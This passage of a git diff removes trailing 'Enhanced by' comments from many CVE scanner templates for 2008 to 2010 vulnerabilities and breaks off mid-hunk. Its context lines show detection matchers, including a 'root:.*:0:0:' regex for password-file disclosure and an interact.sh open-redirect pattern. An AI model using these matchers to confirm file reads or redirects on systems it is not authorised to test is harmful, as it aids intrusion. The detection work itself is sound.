a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 + diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 8a2cb62b01..f3bd59bec6 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -42,4 +42,4 @@ http: - 200 -# Enhanced by mp on 2022/08/31 + diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index eb9da66463..a0a580c3c1 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -40,4 +40,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index e290327809..e9d33208ab 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index b4217fd09d..33fe0fce57 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 0249845b8c..375899157a 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 3c37314536..704e82270c 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 + diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 4e1804e53f..fdf7a58ecb 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 97a0925006..1d72375491 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 7348db9a5d..cdff49137b 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 5d52e6f455..33011ccb0f 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -45,4 +45,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/08 + diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index c0741ea067..fc305b09f1 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 2010a10f9b..92336fe1ce 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -41,4 +41,4 @@ http: status: - 500 -# Enhanced by md on 2022/09/20 + diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 1ed6add33b..491359f575 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -30,4 +30,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/04/18 + diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index 1558e98fb2..1edf5c09e9 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 156a5ff2f4..009b29959a 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml @@ -41,4 +41,4 @@ http: regex: - "root:.*:0:0:" -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index ca650a0529..0e8c8e029a 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 2aa7306919..4060580924 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index b9b0fe674e..0fac13bd94 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/12 + diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index c435d647cc..3f796e302e 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index cdd5418851..2764356b9f 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index 4b0bee0bfe..e3ed126755 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 + diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index b5158a8400..1eb7be9177 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index c5b12389a2..e8bb0c04d1 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 6dcd3e601e..4cc0236142 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -35,4 +35,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/06 + diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index 7bd3d866fb..1589e43531 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/08 + diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 965ee5713c..a3960b8127 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -30,4 +30,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index dc3a007cc8..aae4a8d01f 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0157.yaml b/http/cves/2010/CVE-2010-0157.yaml index 5085dd1492..7f0e7d9ccd 100644 --- a/http/cves/2010/CVE-2010-0157.yaml +++ b/http/cves/2010/CVE-2010-0157.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0219.yaml b/http/cves/2010/CVE-2010-0219.yaml index b6b2ca198a..1e7ca4f609 100644 --- a/http/cves/2010/CVE-2010-0219.yaml +++ b/http/cves/2010/CVE-2010-0219.yaml @@ -54,4 +54,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/02 + diff --git a/http/cves/2010/CVE-2010-0467.yaml b/http/cves/2010/CVE-2010-0467.yaml index 45b762be10..f39ecd70c8 100644 --- a/http/cves/2010/CVE-2010-0467.yaml +++ b/http/cves/2010/CVE-2010-0467.yaml @@ -33,4 +33,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 82253c57fe..7dd9d25a7b 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0759.yaml b/http/cves/2010/CVE-2010-0759.yaml index c1fa28cb28..fd3f90e3c5 100644 --- a/http/cves/2010/CVE-2010-0759.yaml +++ b/http/cves/2010/CVE-2010-0759.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index 1610c0053f..3c452126c9 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index d5cea18134..ef1b34158f 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index 91074a1ed3..3c0f8d60fa 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 43c553048a..b95cdcbd01 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 00613d5a2f..b7f5b6676c 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 57ac47a224..a86ad7cc43 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index 59d9cb2d9e..565bc59a4a 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index db57c1558c..214a04c35c 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 1d3b81fcc9..a68e397f50 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/13 + diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index f1eeb0ca5e..00d4c1f905 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index e65e3dd648..59a5043213 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index a510d48b34..dbd17fa82f 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 4b1299fdb7..2a80666b65 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index 244dec6296..c986fbb259 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index a1847b7be6..8a3612ab6d 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index edac850f8d..8fe193f10c 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 156148818e..3fcf738d59 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index fe00eb5cc6..1c013cd199 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index ca7dd58a15..4a95fcf300 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 8a3774fbf8..4b95cb8cef 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index 2f24725953..6a3e9c0c98 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 4dba7a7b07..820cb7f364 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index d490805b8b..8daceadb8e 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index e8098ba157..173821e2cf 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 433c7f2dc2..c1e4cc3b0e 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index ffd45a5ff0..063ccc4138 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by md on 2023/01/30 + diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 2935deea59..9c0ae844ae 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index cc70d52559..db9aa991f0 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 4592a63630..0de4bdbe30 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 86d32fc94c..ed23febd0b 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index b9eaa3f4cb..fbf113b0f3 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 9ac80976a7..60a3da59f3 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 476c697cd8..48364d07b5 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index b0fdf7431b..746afa3318 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/24 + diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 772fd73703..14fb8cf37b 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index d8f796dbb7..7ce284dccf 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 850b15eccd..fad311e31f 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 07805d0565..2c5d5ab0f5 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 522fa417f8..36832656fc 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 6695b609cf..533ac33d1f 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/14 + diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index aa4f6783bd..e1fafb9443 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 00de42c7d4..8e5adbf4ae 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 462028c6a7..2e19d7978a 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 60a2398d6c..01d41df670 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/24 + diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 116d7727d5..8b507af220 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/06 + diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index 5acc60f5f5..06b18e3844 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/24 + diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 124304f307..0796588e46 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 + diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index d4bdc9f4bc..9ca8ff3086 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/15 + diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index c8c8962cad..fdf95cabd1 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/07 + diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 5f0b80c144..20a6549466 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/23 + diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 242e6be9b0..50bcc50d83 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/27 + diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 98d74e6505..c8698cc2d4 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/27 + diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index affe396cd3..4e4516ccd2 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/28 + diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 573e95c4a9..6e7f720fe2 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/28 + diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 25f8fba46e..f521c4b1a7 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/10 + diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index aa83eb41da..de0cb8eada 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/01 + diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 